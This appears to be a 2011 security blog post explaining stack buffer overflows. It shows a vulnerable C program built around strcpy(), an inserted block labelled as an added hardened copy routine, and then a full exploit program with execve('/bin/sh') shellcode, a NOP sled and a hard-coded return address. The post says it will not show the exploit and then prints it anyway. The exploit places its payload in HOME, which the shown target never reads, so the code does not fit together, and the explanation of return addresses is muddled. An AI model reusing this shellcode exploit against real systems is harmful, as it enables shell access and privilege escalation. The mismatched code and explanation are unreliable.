Pro Corner

Exploited: The buffer overflow
Posted in Security & Technology on February 7, 2011 , by Harry Ellis


Many people ask: how do hackers do what they do? How do they gain access to systems? Basically, they probe and prod until they find a vulnerability. The most common vulnerability is a buffer overflow in poorly written software. Remember, most real hackers don’t want to crash a system; they want control of it. With a buffer overflow, the hacker stuffs more data into a programmer’s buffer than it can hold. By doing this and using some creative memory inspection tools, the hacker can see which memory location on the stack was going to be executed next. Knowing this allows the hacker to inject additional code that modifies the return address, thereby executing an additional program, in most cases a shell prompt.

So what does a poorly written program that is susceptible to an overflow look like?

Precompiled program called Overflow

#include <string.h>

/* Copies str into a 16-byte stack buffer with no length check (the bug) */
void overflow(char *str) {
   char buffer[16];

   strcpy(buffer, str);   /* unbounded copy: anything past 16 bytes smashes the stack */
}

int main(void) {
  char Lstring[256];
  int i;

  /* Fill the string with 255 'A's, far more than overflow()'s buffer holds */
  for (i = 0; i < 255; i++)
    Lstring[i] = 'A';
  Lstring[255] = '\0';

  overflow(Lstring);
  return 0;
}

This simple program has the typical buffer overflow error: it copies a supplied string without any bounds checking by using strcpy() instead of strncpy(). If you run this program you will get a segmentation violation. The buffer in the overflow function is only 16 bytes, while the for loop writes the letter A 255 times into the string that is passed in, so the copy overflows the buffer.
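As an added example, not code from the original post, here is a hardened counterpart to the overflow() function above: a bounded copy that always leaves the buffer NUL-terminated and rejects input that would not fit, plus a small check showing why a bare strncpy() is not a complete fix on its own, since it writes no terminator when the source fills the buffer. The names safe_copy, overflow_fixed, strncpy_leaves_terminator and demo_page_input are this example's own; the 255-'A' input in main mirrors the page's test string.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 16   /* same size as the page's overflow() buffer */

/* Bounded copy that always NUL-terminates dst.
   Returns 0 when src fit entirely, -1 when it had to be truncated
   (the caller can then reject the input instead of silently using it). */
int safe_copy(char *dst, size_t dst_size, const char *src) {
    size_t len = strlen(src);
    if (dst_size == 0)
        return -1;
    if (len >= dst_size) {
        memcpy(dst, src, dst_size - 1);
        dst[dst_size - 1] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);   /* includes the terminator */
    return 0;
}

/* Hardened version of the page's overflow(): oversize input is rejected
   rather than copied. Returns the stored length, or -1 if rejected. */
int overflow_fixed(const char *str) {
    char buffer[BUF_SIZE];
    if (safe_copy(buffer, sizeof buffer, str) != 0)
        return -1;   /* would have overflowed the 16-byte buffer */
    return (int)strlen(buffer);
}

/* The strncpy() pitfall: strncpy(dst, src, n) pads with NULs only when src
   is shorter than n. If src has n or more bytes, no terminator is written
   and dst is not a valid C string. Returns 1 if a NUL is present, else 0. */
int strncpy_leaves_terminator(const char *src) {
    char buffer[BUF_SIZE];
    memset(buffer, 'X', sizeof buffer);   /* poison so a missing NUL is visible */
    strncpy(buffer, src, sizeof buffer);
    return memchr(buffer, '\0', sizeof buffer) != NULL;
}

/* Constructed input mirroring the page's loop: 255 'A's, then a terminator. */
int demo_page_input(void) {
    char lstring[256];
    memset(lstring, 'A', 255);
    lstring[255] = '\0';
    return overflow_fixed(lstring);
}

int main(void) {
    printf("overflow_fixed(255 x 'A') -> %d (rejected)\n", demo_page_input());
    printf("overflow_fixed(\"hello\")   -> %d\n", overflow_fixed("hello"));
    printf("strncpy terminated for 15-byte source? %d\n",
           strncpy_leaves_terminator("123456789012345"));
    printf("strncpy terminated for 16-byte source? %d\n",
           strncpy_leaves_terminator("1234567890123456"));
    return 0;
}
```

Build with `cc -Wall overflow_fixed.c` (assumed file name). The design point is that the fix is not just "use strncpy": the copy must be bounded by the destination size, the result must be terminated, and the caller must be told when input was too long so it can refuse it.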

Once you execute the vulnerable program and overrun the buffer you will most likely get a long string of characters. These characters are the return address of the next function call for the program. To properly exploit the buffer you will need to convert these strings to hex. So, for example, if the return address space is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA…… then your return address is 41414141. By knowing the return address space and doing a little basic math, you can inject a new return address into the buffer of another program, which could potentially execute a shell for a hacker to gain control over. Sorry readers, I’m not going to show you how to do it :) but basically you do the following:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Define the shellcode in hex */

static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

/* Define your address space */
#define NOP     0x90
#define LEN     1032
#define RET     0xbffff574

/* Exploit Program */

int main()
{
char buffer[LEN];
long retaddr = RET;
int i;

fprintf(stderr,"using address 0x%lx\n",retaddr);

/* fill the whole buffer with the guessed return address */
for (i=0 ;i < LEN ; i+=4)
   *(long *)&buffer[i] = retaddr;

/* overwrite the front of it with NOPs */
for (i=0 ;i < LEN - strlen(shellcode) - 100; i++)
   *(buffer+i) = NOP;

/* after the end of the NOPs, we copy in the execve() shellcode */

memcpy(buffer+i,shellcode,strlen(shellcode));

/* export the variable, run Overflow */

setenv("HOME", buffer, 1);
execlp("Overflow","Overflow",NULL);
return 0;
}

Note this is an attack example, and is only used for demonstration purposes.

So while a computer is relatively safe from hacking as long as you are using the proper devices, firewalls and anti-virus/anti-malware software, it is still susceptible if you install untrusted software. This is why most IT departments will lock down your ability to install software. Trust me, it’s not because we like to keep busy… It’s because we want to make sure the systems we manage stay in our control. It’s also the responsibility of programmers to write secure programs, especially in secure or publicly accessible environments.


